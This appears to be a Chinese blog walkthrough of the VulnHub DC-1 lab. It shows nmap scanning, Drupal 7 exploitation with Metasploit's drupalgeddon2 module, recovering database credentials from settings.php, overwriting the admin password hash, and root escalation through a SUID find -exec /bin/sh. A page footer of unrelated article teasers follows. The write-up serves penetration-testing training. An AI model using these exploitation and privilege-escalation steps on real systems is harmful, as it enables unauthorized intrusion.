vulnhub通关-1 DC-1(含靶场资源)

一、环境搭建

1.环境描述

描述

描述:
DC-1 is a purposely built vulnerable lab for the purpose of gaining
experience in the world of penetration testing.

Dc-1是一个专门构建的易受攻击的实验室,目的是获得渗透测试领域的经验。

It was designed to be a challenge for beginners, but just how easy it
is will depend on your skills and knowledge, and your ability to
learn.

它被设计成对初学者的一个挑战,但是它有多简单取决于你的技能和知识,以及你的学习能力。

To successfully complete this challenge, you will require Linux
skills, familiarity with the Linux command line and experience with
basic penetration testing tools, such as the tools that can be found
on Kali Linux, or Parrot Security OS.

要成功完成这个挑战,您需要 Linux 技能、熟悉 Linux 命令行和基本渗透测试工具的经验,例如可以在 Kali Linux 或
Parrot Security OS 上找到的工具。

There are multiple ways of gaining root, however, I have included some
flags which contain clues for beginners.

有多种获得根的方法,但是,我已经包括了一些标志,其中包含初学者的线索。

There are five flags in total, but the ultimate goal is to find and
read the flag in root’s home directory. You don’t even need to be root
to do this, however, you will require root privileges.

总共有五个标志,但最终目标找到并读取 root 用户主目录中的标志。您甚至不需要成为 root 用户就可以做到这一点,但是,您需要
root 特权。

Depending on your skill level, you may be able to skip finding most of
these flags and go straight for root.

根据您的技能水平,您可以跳过查找大多数这些标志,直接访问 root 用户。

Beginners may encounter challenges that they have never come across
previously, but a Google search should be all that is required to
obtain the information required to complete this challenge.

初学者可能会遇到他们以前从未遇到过的挑战,但是 Google 搜索应该是完成这个挑战所需要的全部信息。

题目描述概括(目标)

共有五个flag,最终目标是找到root用户主目录中的flag。

2. 靶场下载

下载地址

https://www.vulnhub.com/entry/dc-1,292/

在这里插入图片描述

3.环境启动

1.解压文件
在这里插入图片描述
2.在VMware中打开ova文件
在这里插入图片描述
3.接下来选择你想导入的路径,进行导入即可
在这里插入图片描述
4.注意 遇到这种报错可以忽略,点击重试继续导入
在这里插入图片描述
5.开启DC-1后,显示出登录界面就证明环境基本搭建好了
在这里插入图片描述
6.网络设置,要与攻击机kali在同一网段,要么都用NAT模式,要么都用桥接模式(我这里用是是NAT模式)
在这里插入图片描述
在这里插入图片描述

二、渗透靶场

1.信息收集:寻找靶机IP

分析

NAT网段在192.168.1.0/24,所以扫描此网段

nmap扫描存活主机

nmap 192.168.1.0/24

在这里插入图片描述

扫描结果分析

扫描出5台存活主机
192.168.1.1 确定是VMnet8的IP
192.168.1.101 不确定
192.168.1.200 不确定
192.168.1.254 确定是网关
192.168.1.102 确定是本机kali的IP

图1 VMnet8
在这里插入图片描述
图2 网关
在这里插入图片描述

进过第一轮分析后还剩192.168.1.101和192.168.1.200 不确定
接下来进行ping测试

在这里插入图片描述

发现192.168.1.200是ping不通,那么确定192.168.1.101就是我们的靶机

2.信息收集:探测端口和服务

命令

nmap -A -p- -v 192.168.1.101

分析

-A:启用操作系统检测、版本检测、脚本扫描和路由追踪
-p-:扫描目标主机上的所有端口
-v:扫描过程中的详细输出

3.访问Web站点

发现是Drupal通用模板

在这里插入图片描述

再次查看nmap扫描结果,扫描到通用模板Drupal 7
在这里插入图片描述

4.MSF渗透

命令 作用:查找通用模板漏洞

MSF命令简介

msfconsole		进入MSF控制台
search 			搜索相应模块
use           	对应模块
show options  	查看信息
set RHOST  		远程主机ip
run           	攻击

搜索Drupal 7相关漏洞

searchsploit Drupal 7

在这里插入图片描述

进入msf

msfconsole

在这里插入图片描述

搜索Drupal框架漏洞

search Drupal

在这里插入图片描述

利用漏洞进行测试

这里用的是序号1的漏洞

use exploit/unix/webapp/drupal_drupalgeddon2

在这里插入图片描述

设置被攻击IP

set rhosts 192.168.1.101

在这里插入图片描述

运行此漏洞

run

在这里插入图片描述

进入shell

shell

在这里插入图片描述

查看当前权限

whoami

在这里插入图片描述

发现flag1

提示跟配置文件有关

在这里插入图片描述

发现flag4

根据环境描述,进入home目录查看,发现flag4 。flag4提示需要提升权限

在这里插入图片描述

发现flag2

根据flag1的提示查看配置文件
默认配置文件路径

/var/www/sites/default/settings.php
在这里插入图片描述
发现数据库登录用户名和密码

返回一个交互式shell

python -c ‘import pty;pty.spawn(“/bin/bash”)’

在这里插入图片描述

登入MySQL

在这里插入图片描述

查看数据库

在这里插入图片描述

查看用户表

在这里插入图片描述

置换密码

使用官网忘记密码方法

http://drupalchina.cn/node/2128

在站点路径下执行 php scripts/password-hash.sh 新密码
在这里插入图片描述
更新数据库密码

update users set pass=‘ S S SDHsT3m4kaiQiN.w7oV.pQ64f/Nw5o2DhDZtpR01Uc1.H3MPHWmJR’ where name=‘admin’;

在这里插入图片描述

登入Web站点

在这里插入图片描述

发现flag3

在这里插入图片描述
查看flag3的值:提示用find中的-exec提升权限

权限提升

查看 suid 权限的可执行二进制程序

find / -perm -4000 2>/dev/null

在这里插入图片描述

发现find命令

创建一个666文件让find来查找 在查找的过程中使用-exec携带whoami执行命令

find / -name 666 -exec "whoami" \;

在这里插入图片描述
进入shell程序,执行命令

find / -name 666 -exec "/bin/sh" \;
cd /root
ls

在这里插入图片描述

至此,恭喜你通过了本关卡!

三、相关资源

靶场下载:
https://www.vulnhub.com/entry/dc-1,292/

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/635641.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

读懂比特币—bitcoin代码分析(一)

最近美国 SEC 通过了比特币的 ETF申请,比特币究竟是个什么东西,从技术上来说,bitcoin 是一个点对点的电子现金系统,它可以实现分布式的记账,不依赖中心化的账务系统(比如银行,支付宝&#xff09…

ValueError: Unable to read workbook: could not read strings from data.xlsx解决方案

大家好,我是爱编程的喵喵。双985硕士毕业,现担任全栈工程师一职,热衷于将数据思维应用到工作与生活中。从事机器学习以及相关的前后端开发工作。曾在阿里云、科大讯飞、CCF等比赛获得多次Top名次。现为CSDN博客专家、人工智能领域优质创作者。喜欢通过博客创作的方式对所学的…

免费的网站站群软件,批量管理不同网站程序

在网站运营的过程中,站群软件成为提高效率、管理多个网站的得力助手。本文将专心分享三款卓越的站群软件,其中特别推荐147SEO软件,它不仅能够批量管理网站,还能自动更新原创文章,并主动推送各大搜索引擎。不论您运营何…

音频筑基:时延、帧长选取的考量

音频筑基:时延、帧长选取的考量 帧长与时延的关系帧长变化的影响参考资料 音频算法中,时延和音频帧长的选择通常是个需要平衡的参数,这里分析下背后的考量因素。 帧长与时延的关系 一般来说,帧长是音频算法端到端时延的子集&…

Python操作Excel基础

一、使用Python对Excel读写数据 1.模块、包、库概念 Module(模块):扩展名为.py的文件就可以称作为模块Package(包):在模块只上的概念,为了方便管理.py模块文件进行打包。包目录下第一个文件必…

爬虫爬取数据遇到302,301重定向如何获取重定向后的地址(完美解决)

当用java或者python爬取目标网站的时候&#xff0c;浏览器可以正确重定向&#xff0c;而用编程爬取始终是code:200 只需要将请求头修改成如下&#xff0c;可以根据需要进行更改 Map<String, String> headers Map.of("Accept", "text/html,application/xh…

【征服Redis10】一文理解redis为什么这么快

Redis之所以一统分布式缓存的江湖&#xff0c;其中一大优势就是快&#xff0c;到底有多快呢&#xff1f;官方测试数据表明每秒可以处理13万次set或者lpush请求&#xff0c;执行lua调用可以达到12万次之多。一般来说&#xff0c;我们的Java服务&#xff0c;单台服务qps到达1000就…

ECharts实现简单饼图和柱状图

1.饼图 前端使用vue&#xff0c;后端使用SpringBoot <template><div><div class"card" style"padding: 15px">数据可视化分析&#xff1a;图书类型销量</div><div style"display: flex; margin: 10px 0"><di…

银行是地球村最大“车主”

有网友调侃说中国的银行已经成了地球村里最大的“房东”&#xff0c;这话的可信度高。可是&#xff0c;中国的银行还渐渐的在成为地球村里最大的“车主”。此言并非耸人听闻&#xff0c;“80多家4s店被查封 银行连夜拖车 网络炸锅”这新闻可佐证。 截图&#xff1a;来源今日国内…

Android分区挂载原理介绍(上)

一、 device-mapper基本原理介绍 1.1 dm工作原理 1.2 dm实现动态卷(逻辑分区)功能介绍(dm-linear) 1.3 dm 实现完整性校验功能介绍(dm-verity) 1.4 元数据加密(default-key) 1.5 dm实现快照功能介绍(snapshot,snapshot-origin,dm-snapshot-…

根据IP查找城市 - 华为OD统一考试

OD统一考试 题解&#xff1a; Java / Python / C 题目描述 某业务需要根据终端的IP地址获取该终端归属的城市&#xff0c;可以根据公开的IP地址池信息查询归属城市。 地址池格式如下&#xff1a; 城市名起始IP&#xff0c;结束IP 起始和结束地址按照英文逗号分隔&#xff0…

python字母异位词分组

给你一个字符串数组&#xff0c;请你将 字母异位词 组合在一起。可以按任意顺序返回结果列表。 字母异位词 是由重新排列源单词的所有字母得到的一个新单词。 示例 1: 输入: strs ["eat", "tea", "tan", "ate", "nat", &…

非线性最小二乘问题的数值方法 —— 狗腿法 Powell‘s Dog Leg Method (I - 原理与算法)

Title: 非线性最小二乘问题的数值方法 —— 狗腿法 Powell’s Dog Leg Method (I - 原理与算法) 文章目录 I. 前言II. 线搜索类型和信赖域类型1. 线搜索类型 —— 最速下降法2. 信赖域类型3. 柯西点 III. 狗腿法的原理1. 狗腿法的构建2. 狗腿法的优化说明3. 狗腿法的插值权重 I…

Java 全栈知识点问题汇总(上)

Java 全栈知识点问题汇总&#xff08;上&#xff09; 1 Java 基础 1.1 语法基础 面向对象特性&#xff1f;a a b 与 a b 的区别3*0.1 0.3 将会返回什么? true 还是 false?能在 Switch 中使用 String 吗?对equals()和hashCode()的理解?final、finalize 和 finally 的不同…

Git 配置与理解

简述 Git 在 Windows 和 Ubuntu 中的配置&#xff0c;以及对 Git 工作区域划分和 Git 中对于文件状态划分的理解。 git 基础安装与配置 基于 WSL 的 Ubuntu 下的 git 打开或关闭Windows功能 -> Hyper-V、Virtual Machine Platform、Windows Subsystem for Linux # 1.必须…

STM32407用汇顶的GT911触摸芯片调试实盘

这个配置很关键 代码 #include "stm32f4xx.h" #include "GT9147.h" #include "Touch.h" #include "C_Touch_I2C.h" #include "usart.h" #include "delay.h" #include "LCD.h" #incl…

x86 和 x64 arm的区别

x86和x64是基于英特尔x86架构的复杂指令集架构&#xff08;ISA&#xff09;&#xff0c;而ARM是一种精简指令集架构。 什么是指令集架构 假设我们现在要开发一个cpu&#xff0c;就好比说我们去修建一栋楼&#xff0c;开发商会先将图纸设计好。设计好之后由施工单位按照设计图…

openssl3.2 - 官方demo学习 - signature - EVP_DSA_Signature_demo.c

文章目录 openssl3.2 - 官方demo学习 - signature - EVP_DSA_Signature_demo.c概述笔记END openssl3.2 - 官方demo学习 - signature - EVP_DSA_Signature_demo.c 概述 DSA签名(摘要算法SHA256), DSA验签(摘要算法SHA256) 签名 : 用发送者的私钥进行签名. 验签 : 用发送者的公…

基于SSM的图书馆管理系统(有报告)。Javaee项目。ssm项目。

演示视频&#xff1a; 基于SSM的图书馆管理系统&#xff08;有报告&#xff09;。Javaee项目。ssm项目。 项目介绍&#xff1a; 采用M&#xff08;model&#xff09;V&#xff08;view&#xff09;C&#xff08;controller&#xff09;三层体系结构&#xff0c;通过Spring Sp…

win系统环境搭建(十四)——Windows系统下使用docker安装mysql8和mysql5.7

windows环境搭建专栏&#x1f517;点击跳转 win系统环境搭建&#xff08;十四&#xff09;——Windows系统下使用docker安装mysql8和mysql5.7 文章目录 win系统环境搭建&#xff08;十四&#xff09;——Windows系统下使用docker安装mysql8和mysql5.7MySQL81.新建文件夹2.创建…